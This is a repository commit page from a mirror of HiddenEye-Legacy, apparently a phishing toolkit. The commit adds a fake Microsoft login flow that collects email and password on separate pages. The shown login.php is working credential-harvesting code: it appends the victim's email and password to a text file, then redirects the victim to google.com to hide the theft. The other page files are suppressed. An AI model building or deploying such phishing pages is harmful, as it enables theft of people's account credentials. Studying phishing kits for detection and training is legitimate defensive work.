mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Microsoft login page updated
email and pass fields on separate pages.
This commit is contained in:
parent
9adc6ea5e0
commit
7e1d7e03e1
127
WebPages/live_web/index.php
Normal file
127
WebPages/live_web/index.php
Normal file
File diff suppressed because one or more lines are too long
22
WebPages/live_web/login.php
Normal file
22
WebPages/live_web/login.php
Normal file
|
@ -0,0 +1,22 @@
|
|||
<?php
|
||||
|
||||
session_start();
|
||||
|
||||
$pass = $_POST["passwd"];
|
||||
$email=$_SESSION["Email"];
|
||||
//opening logins text file for appending new data.
|
||||
//$file = fopen("usernames.txt") or die("Unable to open file!");
|
||||
|
||||
//Writing email and password to logins.txt.
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $email . " [PASS]: " . $pass . "\n", FILE_APPEND);
|
||||
|
||||
|
||||
//redirecting user to the google drive's locations where the game is available to download.
|
||||
//change the location url to redirect to a website of your choice.
|
||||
header('Location: https://www.google.com');
|
||||
exit();
|
||||
|
||||
|
||||
session_destroy();
|
||||
|
||||
?>
|
151
WebPages/live_web/pass.php
Normal file
151
WebPages/live_web/pass.php
Normal file
File diff suppressed because one or more lines are too long
Loading…
Reference in New Issue
Block a user